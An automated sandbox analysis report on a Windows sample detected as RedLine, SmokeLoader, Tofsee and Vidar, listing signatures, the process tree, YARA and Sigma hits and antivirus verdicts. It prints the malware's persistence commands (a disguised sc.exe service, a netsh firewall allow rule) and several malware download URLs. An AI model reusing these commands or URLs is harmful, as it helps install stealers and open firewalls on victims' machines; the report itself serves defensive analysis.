
Windows Analysis Report OG9rNsihJ7.exe

Overview

General Information

Sample Name: OG9rNsihJ7.exe
Analysis ID: 553412
MD5: 5c7b46771055043f59e0451a342b7ed1
SHA1: 5362af084622dc8efc661c703d4c7c5dd6839be1
SHA256: 0245c82558329cfd8ef5ef901e4929075d4d873ba20d9704731758580caed7be
Tags: exe, RedLineStealer

Detection

RedLine, SmokeLoader, Tofsee, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Social media urls found in memory data
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • OG9rNsihJ7.exe (PID: 4948 cmdline: "C:\Users\user\Desktop\OG9rNsihJ7.exe" MD5: 5C7B46771055043F59E0451A342B7ED1)
    • OG9rNsihJ7.exe (PID: 5424 cmdline: "C:\Users\user\Desktop\OG9rNsihJ7.exe" MD5: 5C7B46771055043F59E0451A342B7ED1)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • B1B2.exe (PID: 6924 cmdline: C:\Users\user\AppData\Local\Temp\B1B2.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • BFBD.exe (PID: 6984 cmdline: C:\Users\user\AppData\Local\Temp\BFBD.exe MD5: 5C7B46771055043F59E0451A342B7ED1)
          • BFBD.exe (PID: 7140 cmdline: C:\Users\user\AppData\Local\Temp\BFBD.exe MD5: 5C7B46771055043F59E0451A342B7ED1)
          • svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • 254E.exe (PID: 1268 cmdline: C:\Users\user\AppData\Local\Temp\254E.exe MD5: 41AB3EFA04441E560A279BD0F7C0503D)
        • 3136.exe (PID: 5060 cmdline: C:\Users\user\AppData\Local\Temp\3136.exe MD5: 023802260A0216012A5F00079406D967)
          • cmd.exe (PID: 5992 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 1928 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 3532 cmdline: C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5500 cmdline: C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 7068 cmdline: "C:\Windows\System32\sc.exe" start ffiawxs MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 3720 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 3BC6.exe (PID: 6244 cmdline: C:\Users\user\AppData\Local\Temp\3BC6.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 3BC6.exe (PID: 7064 cmdline: C:\Users\user\AppData\Local\Temp\3BC6.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 3756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4840 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6092 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2600 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4568 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 2076 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1188 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6656 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • vfgiwcs (PID: 6824 cmdline: C:\Users\user\AppData\Roaming\vfgiwcs MD5: 5C7B46771055043F59E0451A342B7ED1)
    • vfgiwcs (PID: 6840 cmdline: C:\Users\user\AppData\Roaming\vfgiwcs MD5: 5C7B46771055043F59E0451A342B7ED1)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 7148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • xqfkdfcl.exe (PID: 5432 cmdline: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe" MD5: 5C50CF4AF77D12BF94B3FC09437C8B16)
    • svchost.exe (PID: 3440 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\8017.exe | Rule: SUSP_PE_Discord_Attachment_Oct21_1 | Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Author: Florian Roth
Strings:
  • 0x3b87:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

Source: 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmp | Rule: JoeSecurity_Tofsee | Description: Yara detected Tofsee | Author: Joe Security
Source: 00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmp | Rule: JoeSecurity_SmokeLoader_2 | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp | Rule: JoeSecurity_Vidar_1 | Description: Yara detected Vidar stealer | Author: Joe Security
(5 of 22 entries shown)

Unpacked PEs

Source: 19.1.vfgiwcs.400000.0.unpack | Rule: JoeSecurity_SmokeLoader_2 | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 30.2.3BC6.exe.3aaf910.1.raw.unpack | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 1.1.OG9rNsihJ7.exe.400000.0.unpack | Rule: JoeSecurity_SmokeLoader_2 | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 42.2.xqfkdfcl.exe.840000.2.raw.unpack | Rule: JoeSecurity_Tofsee | Description: Yara detected Tofsee | Author: Joe Security
Source: 19.2.vfgiwcs.400000.0.unpack | Rule: JoeSecurity_SmokeLoader_2 | Description: Yara detected SmokeLoader | Author: Joe Security
(5 of 24 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
  Source: Process started
  Author: David Burkett
  Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe", ParentImage: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe, ParentProcessId: 5432, ProcessCommandLine: svchost.exe, ProcessId: 3440
Sigma detected: Copying Sensitive Files with Credential Data
  Source: Process started
  Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
  Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\3136.exe, ParentImage: C:\Users\user\AppData\Local\Temp\3136.exe, ParentProcessId: 5060, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\, ProcessId: 1928
Sigma detected: Suspicious Svchost Process
  Source: Process started
  Author: Florian Roth
  Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe", ParentImage: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe, ParentProcessId: 5432, ProcessCommandLine: svchost.exe, ProcessId: 3440
Sigma detected: Netsh Port or Application Allowed
  Source: Process started
  Author: Markus Neis, Sander Wiebing
  Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\3136.exe, ParentImage: C:\Users\user\AppData\Local\Temp\3136.exe, ParentProcessId: 5060, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 3720
Sigma detected: New Service Creation
  Source: Process started
  Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
  Data: Command: C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\3136.exe, ParentImage: C:\Users\user\AppData\Local\Temp\3136.exe, ParentProcessId: 5060, ProcessCommandLine: C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3532
Sigma detected: Windows Processes Suspicious Parent Directory
  Source: Process started
  Author: vburov
  Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\BFBD.exe, ParentImage: C:\Users\user\AppData\Local\Temp\BFBD.exe, ParentProcessId: 6984, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ProcessId: 7140

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://81.163.30.181/l2.exe | Avira URL Cloud: Label: malware
Source: http://185.7.214.171:8080/6.php | URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe | Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe | URL Reputation: Label: phishing
Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe | Avira URL Cloud: Label: malware
Source: http://81.163.30.181/l3.exe | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Avira: detection malicious, Label: HEUR/AGEN.1211353
Source: C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\2473.exe | Avira: detection malicious, Label: HEUR/AGEN.1212012
Source: C:\Users\user\AppData\Local\Temp\6AF7.exe | Avira: detection malicious, Label: HEUR/AGEN.1212012
Multi AV Scanner detection for submitted file
Source: OG9rNsihJ7.exe | ReversingLabs: Detection: 48%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\45AA.exe | Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\45AA.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\54AF.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\8017.exe | ReversingLabs: Detection: 34%
Machine Learning detection for sample
Source: OG9rNsihJ7.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FC2A.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vfgiwcs | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9789.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\45AA.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8017.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2F32.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\54AF.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\88E2.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7808.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3A7E.exe | Joe Sandbox ML: detected
Source: 28.3.254E.exe.7f0000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 42.2.xqfkdfcl.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 29.2.3136.exe.6c0e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 29.3.3136.exe.7f0000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 42.3.xqfkdfcl.exe.7f0000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 44.2.svchost.exe.7b0000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 28.2.254E.exe.6c0e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 29.2.3136.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 42.2.xqfkdfcl.exe.840000.2.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 42.2.xqfkdfcl.exe.680e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C76C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C4A80 CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C7760 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C73E0 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C79F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\254E.exe | Unpacked PE file: 28.2.254E.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Unpacked PE file: 29.2.3136.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe | Unpacked PE file: 42.2.xqfkdfcl.exe.400000.0.unpack
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49949 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49950 version: TLS 1.0
Source: OG9rNsihJ7.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49876 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49918 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49921 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: Binary string: msvcrt.pdbk | source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb( | source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355319445.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355100434.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355041486.000000000541B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355698589.0000000003678000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
Source: Binary string: C:\xore salafoyukumabu3\ra.pdb | source: 254E.exe, 0000001C.00000000.351672177.0000000000401000.00000020.00020000.sdmp
Source: Binary string: msvcrt.pdb | source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb | source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355300183.0000000003672000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.356247461.0000000003672000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk | source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb | source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
Source: Binary string: AC:\xore salafoyukumabu3\ra.pdbh | source: 254E.exe, 0000001C.00000000.351672177.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wgdi32.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb | source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
Source: Binary string: [+C:\mubinidefup56_bum.pdbh | source: OG9rNsihJ7.exe, 00000000.00000002.238062965.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000000.00000000.231517264.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000001.00000000.236309691.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000000.326118526.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000002.333467369.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000013.00000000.329837112.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000002.355073966.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000000.344254452.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000018.00000000.351452912.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wsspicli.pdb | source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb | source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
Source: Binary string: msvcr100.i386.pdb | source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
Source: Binary string: C:\mubinidefup56_bum.pdb | source: OG9rNsihJ7.exe, OG9rNsihJ7.exe, 00000000.00000002.238062965.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000000.00000000.231517264.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000001.00000000.236309691.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000000.326118526.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000002.333467369.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000013.00000000.329837112.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000002.355073966.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000000.344254452.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000018.00000000.351452912.0000000000401000.00000020.00020000.sdmp
Source: Binary string: msvcp_win.pdb | source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
